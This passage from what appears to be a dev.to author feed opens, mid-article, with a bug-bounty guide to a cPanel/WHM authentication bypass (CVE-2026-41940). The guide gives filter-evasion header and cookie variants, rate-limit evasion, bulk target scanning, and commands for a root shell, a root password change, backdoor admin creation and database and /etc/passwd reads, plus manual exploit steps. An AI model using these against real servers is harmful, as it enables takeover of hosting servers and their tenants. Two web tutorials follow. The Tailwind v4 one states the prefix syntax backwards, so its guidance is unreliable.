class="sh">"</span><span class="s">basic </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span><span class="p">},</span> <span class="p">{</span><span class="sh">"</span><span class="s">AUTHORIZATION</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">BASIC </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span><span class="p">},</span> <span class="c1"># Split header </span> <span class="p">{</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Basic</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">X-Payload</span><span class="sh">"</span><span class="p">:</span> <span class="n">payload</span><span class="p">},</span> <span class="p">]</span> </code></pre> </div> <h3> 3. Session Cookie Manipulation </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Different cookie formats </span><span class="n">cookie_variants</span> <span class="o">=</span> <span class="p">[</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="s">; path=/</span><span class="sh">"</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="n">session</span><span class="si">}</span><span class="s">; HttpOnly</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># URL-encoded variations </span> <span class="sa">f</span><span class="sh">"</span><span class="s">whostmgrsession=</span><span class="si">{</span><span class="nf">quote</span><span class="p">(</span><span class="n">session</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> </code></pre> </div> <h3> 4. HTTP Version Smuggling </h3> <ul> <li>Try <code>HTTP/1.0</code> vs <code>HTTP/1.1</code> </li> <li>Try chunked encoding</li> <li>Try <code>Connection: keep-alive</code> vs <code>close</code> </li> </ul> <h3> 5. Rate Limiting Evasion </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Add random delays </span><span class="kn">import</span> <span class="n">random</span><span class="p">,</span> <span class="n">time</span> <span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="n">random</span><span class="p">.</span><span class="nf">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">2.0</span><span class="p">))</span> <span class="c1"># Rotate User-Agents </span><span class="n">user_agents</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">"</span><span class="s">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">curl/8.0.1</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9m3xr2q0ml96paxdjrhq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9m3xr2q0ml96paxdjrhq.png" alt=" " width="800" height="721"></a></p> <h2> Post-Exploitation — What to Demo in Your Report </h2> <p>Bug bounty programs want to see <strong>impact</strong>, not just exploitation. Here's what to demonstrate:</p> <h3> 1. Account Enumeration (Proof of Access) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> list </code></pre> </div> <p><strong>Output to include in report:</strong> Number of cPanel accounts, list of hosted domains, email addresses. This proves you can enumerate all hosted tenants.</p> <h3> 2. Version Confirmation </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> version </code></pre> </div> <p><strong>Output:</strong> Exact cPanel build number. Proves the vulnerability is real and the version is unpatched.</p> <h3> 3. Server Information </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> info </code></pre> </div> <p><strong>Output:</strong> Hostname, load averages, disk usage, MySQL host. Proves you can read server-level configuration.</p> <h3> 4. Sensitive File Read (Minimum Viable Proof) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> cmd <span class="se">\</span> <span class="nt">--cmd</span> <span class="s2">"cat /etc/passwd | head -20"</span> </code></pre> </div> <p><strong>Key insight:</strong> Most programs accept reading <code>/etc/passwd</code> as sufficient proof of RCE/root access. You don't need to demonstrate destructive actions.</p> <h3> 5. Database Access Proof (High Impact) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> cmd <span class="se">\</span> <span class="nt">--cmd</span> <span class="s2">"mysql -e 'SELECT user, host FROM mysql.user' -u root"</span> </code></pre> </div> <p><strong>Impact multiplier:</strong> Proving you can access all MySQL databases on the server (every hosted website's database) significantly increases bounty potential.</p> <h2> Impact </h2> <p>An unauthenticated attacker can:</p> <ol> <li>Gain root-level WHM administrative access</li> <li>Read all server configuration files</li> <li>Access all hosted websites' files and databases</li> <li>Create persistent backdoor admin accounts</li> <li>Modify DNS, SSL certificates, and mail configuration</li> <li>Deface, redirect, or inject malware into all hosted domains</li> </ol> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5hq49j3858blriwba8l.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5hq49j3858blriwba8l.png" alt=" " width="335" height="334"></a></p> <h2> Basic Usage </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Single target scan</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="c"># Single target + interactive shell</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> shell <span class="c"># Bulk scan</span> python3 cPanelSniper.py <span class="nt">-l</span> targets.txt <span class="nt">-t</span> 50 <span class="nt">-o</span> results.json </code></pre> </div> <h2> Post-Exploitation Commands </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># List all accounts</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> list <span class="c"># Execute commands</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> cmd <span class="nt">--cmd</span> <span class="s2">"id"</span> <span class="c"># Interactive shell</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> shell <span class="c"># Change root password</span> python3 cPanelSniper.py <span class="nt">-u</span> https://target.com:2087 <span class="nt">--action</span> passwd <span class="nt">--passwd</span> <span class="s1">'NewP@ss'</span> <span class="c"># Create backdoor admin</span> <span class="c"># (within interactive shell) addadmin backdoor_user Password123!</span> </code></pre> </div> <h2> Exploit (Manual) </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1. GET /openid_connect/cpanelid → Discover hostname 2. POST /login/?login_only=1 → Get session cookie 3. GET / + CRLF Authorization header → Inject payload 4. GET /scripts2/listaccts → Flush cache 5. GET /cpsessTOKEN/json-api/version → Verify root </code></pre> </div> <h2> References </h2> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-41940" rel="noopener noreferrer">https://nvd.nist.gov/vuln/detail/CVE-2026-41940</a></li> <li><a href="https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/" rel="noopener noreferrer">https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/</a></li> <li><a href="https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel" rel="noopener noreferrer">https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel</a></li> <li><a href="https://github.com/ynsmroztas/cPanelSniper" rel="noopener noreferrer">https://github.com/ynsmroztas/cPanelSniper</a></li> <li><a href="https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026" rel="noopener noreferrer">https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026</a></li> </ul> cve202641940 cpanelscrlf crlfauthenticationbypass bugbounty Md Hehedi Hasan Fri, 10 Apr 2026 09:17:27 +0000 https://dev.to/securitytalent/react-js-global-css-complete-guide-beginner-to-advanced-3eec https://dev.to/securitytalent/react-js-global-css-complete-guide-beginner-to-advanced-3eec <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmoom4xh9w5jejsakt2cf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmoom4xh9w5jejsakt2cf.png" alt=" " width="800" height="533"></a></p> <h3> 🧠 React CSS Modules <code>:global()</code> — The Right Way to Use Global Styles </h3> <p>If you're working with React and using <strong>CSS Modules</strong>, you've probably enjoyed the benefit of scoped styles—no more worrying about class name conflicts.</p> <p>But then comes a common challenge:</p> <p>👉 <em>“How do I apply global styles like <code>body</code>, <code>reset</code>, or utility classes?”</em></p> <p>That’s exactly where <code>:global()</code> comes in.</p> <p>In this blog, we’ll break it down in a simple and practical way 👇</p> <h2> 🚀 What is CSS Modules? </h2> <p>CSS Modules scope your CSS locally by default. That means every class you write is tied to a specific component.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="c">/* styles.module.css */</span> <span class="nc">.title</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">blue</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">import</span> <span class="nx">styles</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">./styles.module.css</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">App</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="p">&lt;</span><span class="nt">h1</span> <span class="na">className</span><span class="p">=</span><span class="si">{</span><span class="nx">styles</span><span class="p">.</span><span class="nx">title</span><span class="si">}</span><span class="p">&gt;</span>Hello World<span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;;</span> <span class="p">}</span> </code></pre> </div> <p>✅ No conflicts<br> ✅ Clean structure<br> ✅ Easier maintenance</p> <h2> 🌍 So, What is <code>:global()</code>? </h2> <p>Sometimes, you need styles that apply across your entire app.</p> <p>That’s where <code>:global()</code> helps.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="nd">:global</span><span class="o">(</span><span class="nt">selector</span><span class="o">)</span> <span class="p">{</span> <span class="c">/* global styles */</span> <span class="p">}</span> </code></pre> </div> <p>👉 It tells CSS Modules:<br> “Hey, don’t scope this—make it global.”</p> <h2> 🎯 Real Example: Styling the <code>body</code> </h2> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="c">/* styles.module.css */</span> <span class="nd">:global</span><span class="o">(</span><span class="nt">body</span><span class="o">)</span> <span class="p">{</span> <span class="nl">margin</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="nl">font-family</span><span class="p">:</span> <span class="n">Arial</span><span class="p">,</span> <span class="nb">sans-serif</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>✔ This affects the entire application<br> ✔ Works even inside a module file</p> <h2> 🎨 Example: Creating a Global Utility Class </h2> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="nd">:global</span><span class="o">(</span><span class="nc">.btn</span><span class="o">)</span> <span class="p">{</span> <span class="nl">background</span><span class="p">:</span> <span class="m">#ff4757</span><span class="p">;</span> <span class="nl">color</span><span class="p">:</span> <span class="no">white</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">10px</span> <span class="m">16px</span><span class="p">;</span> <span class="nl">border</span><span class="p">:</span> <span class="nb">none</span><span class="p">;</span> <span class="nl">cursor</span><span class="p">:</span> <span class="nb">pointer</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">button</span> <span class="na">className</span><span class="p">=</span><span class="s">"btn"</span><span class="p">&gt;</span>Click Me<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> </code></pre> </div> <p>👉 Useful for reusable UI elements</p> <h2> ⚖️ Local vs Global Styles </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Local (Default)</th> <th>Global (<code>:global</code>)</th> </tr> </thead> <tbody> <tr> <td>Scope</td> <td>Component-only</td> <td>Entire app</td> </tr> <tr> <td>Safety</td> <td>No conflicts</td> <td>Risk of conflicts</td> </tr> <tr> <td>Best for</td> <td>UI components</td> <td>Reset &amp; utilities</td> </tr> </tbody> </table></div> <h2> 🔀 Mixing Local and Global </h2> <p>You can use both together:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="nc">.card</span> <span class="p">{</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">20px</span><span class="p">;</span> <span class="nl">background</span><span class="p">:</span> <span class="m">#f1f2f6</span><span class="p">;</span> <span class="p">}</span> <span class="nd">:global</span><span class="o">(</span><span class="nc">.text-center</span><span class="o">)</span> <span class="p">{</span> <span class="nl">text-align</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>👉 This keeps your component clean while still allowing shared utilities.</p> <h2> 🧩 When Should You Use <code>:global()</code>? </h2> <p>✅ Use it for:</p> <ul> <li>Global resets (<code>body</code>, <code>html</code>)</li> <li>Third-party library overrides</li> <li>Utility classes (e.g., <code>.container</code>, <code>.text-center</code>)</li> </ul> <p>❌ Avoid when:</p> <ul> <li>Styling specific components</li> <li>Overusing global classes (can break structure)</li> </ul> <h2> 🆚 Alternative: Global CSS File </h2> <p>Instead of using <code>:global()</code>, you can define a global stylesheet:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="c">/* global.css */</span> <span class="nt">body</span> <span class="p">{</span> <span class="nl">margin</span><span class="p">:</span> <span class="m">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="dl">'</span><span class="s1">./global.css</span><span class="dl">'</span><span class="p">;</span> </code></pre> </div> <p>👉 This is often cleaner for base styles.</p> <h2> 💡 Pro Tips </h2> <ul> <li>Keep <strong>most styles local</strong> </li> <li>Use <code>:global()</code> only when necessary</li> <li>Combine with utility-first frameworks (like Tailwind) for better scalability</li> </ul> <h2> 🏁 Final Thoughts </h2> <p>CSS Modules give you control and safety.<br> <code>:global()</code> gives you flexibility.</p> <p>👉 The real power comes from knowing <strong>when to use each</strong>.</p> <p>Use global styles carefully, and your React app will stay clean, scalable, and maintainable 🚀</p> css react tutorial webdev Md Hehedi Hasan Fri, 05 Dec 2025 16:39:57 +0000 https://dev.to/securitytalent/how-to-add-any-prefix-in-react-vite-tailwind-css-fk5 https://dev.to/securitytalent/how-to-add-any-prefix-in-react-vite-tailwind-css-fk5 <p>Here is a <strong>clean Markdown file</strong> you can save as<br> <code>ADD_PREFIX_TAILWIND_V4.md</code><br> or anything you want.</p> <h1> 📘 How to Add Any Prefix in React + Vite + Tailwind CSS v4 </h1> <p>In <strong>Tailwind CSS v4</strong>, prefixes are no longer added using <code>tailwind.config.js</code>.<br> Instead, you add the prefix <strong>directly in your CSS <code>@import</code> rule</strong>.</p> <h2> ✅ 1. Open Your Main CSS File </h2> <p>Examples:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>src/index.css </code></pre> </div> <p>or:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>src/App.css </code></pre> </div> <h2> ✅ 2. Import Tailwind With a Custom Prefix </h2> <p>You can use <strong>any prefix</strong> such as:</p> <ul> <li><code>tw</code></li> <li><code>my</code></li> <li><code>ui</code></li> <li><code>x</code></li> <li><code>custom</code></li> <li>anything you want</li> </ul> <h3> Example: </h3> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="k">@import</span> <span class="s1">"tailwindcss"</span> <span class="n">prefix</span><span class="p">(</span><span class="n">tw</span><span class="p">);</span> </code></pre> </div> <p>Or:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="k">@import</span> <span class="s1">"tailwindcss"</span> <span class="n">prefix</span><span class="p">(</span><span class="n">my</span><span class="p">);</span> </code></pre> </div> <p>Or:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="k">@import</span> <span class="s1">"tailwindcss"</span> <span class="n">prefix</span><span class="p">(</span><span class="n">custom</span><span class="p">);</span> </code></pre> </div> <h2> ✅ 3. Use Prefixed Classes in React </h2> <h3> Example (prefix: <code>tw</code>): </h3> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">h1</span> <span class="na">className</span><span class="p">=</span><span class="s">"tw-text-3xl tw-font-bold tw-text-red-500"</span><span class="p">&gt;</span> Hello Tailwind <span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;</span> </code></pre> </div> <h3> Example (prefix: <code>my</code>): </h3> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">h1</span> <span class="na">className</span><span class="p">=</span><span class="s">"my-text-xl my-font-semibold"</span><span class="p">&gt;</span> Custom Prefix Working <span class="p">&lt;/</span><span class="nt">h1</span><span class="p">&gt;</span> </code></pre> </div> <h2> 🎯 Variants (hover, responsive, dark mode) </h2> <p>Tailwind v4 uses this format:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>prefix + variant + ":" + utility </code></pre> </div> <h3> ✔ Correct: </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>tw-hover:text-red-500 tw-md:text-xl tw-dark:bg-black </code></pre> </div> <h3> ❌ Incorrect: </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>tw:hover:text-red-500 tw:text-red-500 </code></pre> </div> <h2> ✅ Example Button (prefix: <code>my</code>) </h2> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="p">&lt;</span><span class="nt">button</span> <span class="na">className</span><span class="p">=</span><span class="err">"</span> <span class="na">my-bg-blue-500</span> <span class="na">my-text-white</span> <span class="na">my-rounded</span> <span class="na">my-hover</span><span class="err">:</span><span class="na">bg-blue-600</span> <span class="err">"</span><span class="p">&gt;</span> Click Me <span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> </code></pre> </div> <h2> 📌 Summary </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Tailwind v4 Behavior</th> </tr> </thead> <tbody> <tr> <td>Add prefix</td> <td><code>@import "tailwindcss" prefix(tw);</code></td> </tr> <tr> <td>Any prefix allowed</td> <td>Yes</td> </tr> <tr> <td>Utility format</td> <td><code>tw-text-red-500</code></td> </tr> <tr> <td>Variants</td> <td><code>tw-hover:bg-black</code></td> </tr> <tr> <td>Wrong format</td> <td><code>tw:bg-black</code></td> </tr> </tbody> </table></div> react vite tailwindprefix tailwindcss